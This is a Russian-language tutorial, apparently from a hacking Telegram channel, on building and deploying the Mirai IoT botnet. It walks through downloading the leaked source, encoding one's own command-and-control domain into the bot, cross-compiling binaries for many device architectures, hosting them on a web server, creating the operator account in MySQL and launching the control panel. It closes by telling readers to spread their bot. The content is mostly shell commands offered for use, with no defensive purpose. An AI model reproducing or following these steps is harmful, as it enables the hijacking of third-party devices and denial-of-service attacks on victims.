Установка и настройка ботнета Mirai

Установка и настройка ботнета Mirai

https://t.me/hackblog

Нам понадобится два VPS KVM сервера и домен. На одном сервере будем ставить сам ботнет, а на втором будем сканировать ботов. Сервера должны быть на базе Debian 8, и иметь как минимум 1GB RAM.


Подключаемся к нашему серверу через PuTTY и начинаем.


# apt-get update -y

# apt-get upgrade -y

# apt-get install unzip gcc golang electric-fence screen sudo git -y

# apt-get install mysql-server -y

# apt-get install mysql-client -y

# apt-get install apache2 -y


При установке MySQL, нужно будет создать пароль для доступа к MySQL для root пользователя. Пароль нормальный придумаете, без всяких "qwerty ".


# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

# bash < <(curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer)

# gvm install go1.4

# gvm use go1.4 [--default]

# gvm install go1.4 -B

# gvm use go1.4

# export GOROOT_BOOTSTRAP=$GOROOT

# gvm install go1.5

# gvm use go1.5

# gvm install go1.8

# gvm use go1.8


После установки всех утилит, качаем исходники бота - https://github.com/jgamblin/Mirai-Source-Code и загружаем на сервер. Командой wget, или просто через программу WinSCP.


# unzip Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master/mirai/tools

# gcc enc.c -o enc

# ./enc string vlmi.su (свой домен пишем, который прикрутили к серверу и жмем Enter).


Тут вы увидите такой текст:


XOR'ing 14 bytes of data...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22


Копируем весь этот текст.


Открываем через nano редактор, или же через WinSCP файл table.c который находится в папке mirai/bot. Должны увидеть это - https://prnt.sc/gcxa2m.


Строка add_entry (TABLE_CNC_DOMAIN) - всё что в кавычках меняем на свой текст, который только что скопировали. Вместо "30" пишем свою цифру, которую тоже только что скопировали. Тоже самое делаем с строкой add_entry(TABLE_SCAN_CB_DOMAIN).


Сохраняем, и закрываем редактор. Идем дальше.


Открываем редактором файл mirai/cnc/main.go. Видим это - https://prnt.sc/gcxdtz. "127.0.0.1" меняем на "127.0.0.1:3306", "password" меняем на наш MySQL пароль который вводили ранее. Сохраняем файл, и закрываем редактор. Далее просто копируем все, что находится ниже.


# mkdir /etc/xcompile

# cd /etc/xcompile

# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2

# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2

# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2

# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2

# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2

# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2

# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2

# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2

# wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2


# tar -jxf cross-compiler-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf cross-compiler-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf cross-compiler-powerpc.tar.bz2

# tar -jxf cross-compiler-sh4.tar.bz2

# tar -jxf cross-compiler-sparc.tar.bz2

# tar -jxf cross-compiler-armv6l.tar.bz2

# rm *.tar.bz2

# mv cross-compiler-armv4l armv4l

# mv cross-compiler-i586 i586

# mv cross-compiler-m68k m68k

# mv cross-compiler-mips mips

# mv cross-compiler-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv cross-compiler-sh4 sh4

# mv cross-compiler-sparc sparc

# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin

# export PATH=$PATH:/etc/xcompile/m68k/bin

# export PATH=$PATH:/etc/xcompile/mips/bin

# export PATH=$PATH:/etc/xcompile/mipsel/bin

# export PATH=$PATH:/etc/xcompile/powerpc/bin

# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

# export PATH=$PATH:/etc/xcompile/sh4/bin

# export PATH=$PATH:/etc/xcompile/sparc/bin

# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin

# export GOPATH=$HOME/Documents/go

# go get github.com/go-sql-driver/mysql

# go get github.com/mattn/go-shellwords

# cd Mirai-Source-Code-master/mirai

# ./build.sh debug telnet

# ./build.sh release telnet

# cd Mirai-Source-Code-master/mirai/release

# mv mirai* /var/www/html

# cd /var/www/html

# mkdir bins

# mv * bins/

# cd


Теперь MySQL.


# mysql -u root -p


Тут попросят пароль. Вводим пароль который ранее установили.


# create database mirai;

# use mirai


Теперь копируем весь текст - https://pastebin.com/QVD48J8s вставляем, и жмем Enter.


Копируем этот текст - https://pastebin.com/JwYSgE4v


Вместо anna-senpai пишем свой логин. Любой. Так же и с myawesomepassword. Эти данные нам нужны будут для доступа в панель управления ботом.


Должно быть вот так - INSERT INTO users VALUES (NULL, 'login', 'password', 0, 0, 0, 0, -1, 1, 30);


Копируем, вставляем, жмем Enter. Теперь можно выходить.


# exit


Уже почти всё.


# cd Mirai-Source-Code-master/mirai/release

# touch prompt.txt

# screen ./cnc


Должны увидеть надпись MySQL DB opened. Не закрываем эту сессию, открываем новую. http://prntscr.com/gcxunx вместо vlmi.su пишем свой домен, и жмем Open. Вводим логин и пароль.


Всё, мы в панели управления ботом. Теперь вам осталось распространить своего бота.


Канал: @hackblog

Сайт: http://hackblog.ru/

Чат: @hackblogchat

Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org